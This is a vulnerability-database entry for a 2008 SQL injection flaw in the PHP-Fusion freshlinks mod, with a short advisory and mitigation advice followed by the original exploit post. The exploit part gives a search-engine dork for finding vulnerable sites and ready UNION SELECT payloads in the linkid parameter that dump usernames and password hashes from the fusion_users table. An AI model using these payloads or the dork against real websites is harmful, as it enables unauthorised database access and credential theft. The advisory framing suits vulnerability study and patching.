PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vulnerability

vendor:

freshlinks

by:

boom3rang

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: freshlinks

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in PHP-Fusion Mod freshlinks (linkid). An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application, which can be used to access or modify the contents of the database. An attacker can use the vulnerability to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

########################################################
PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vulnerability
########################################################



++++++++++++++++++++++++++++
Author     :     boom3rang
webpage  :    www.khg-crew.ws 
greetz     :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er | Kosova Hackers Group.
++++++++++++++++++++++++++++




[+] Dork:                     inurl:"freshlinks_panel/index.php?linkid"

[+] Example:         http://localhost/infusions/freshlinks_panel/index.php?linkid= [SQL] &frame

username:
index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6,7,8/**/from/**/fusion_users--&frame

password: 
index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6,7,8/**/from/**/fusion_users--&frame


ps. Username and Password you can find in Title!

############################################
                     =United State of Albania=
                        -Porud 2 be Albanian-
                        -Proud 2 be Muslim-
############################################

# milw0rm.com [2008-09-28]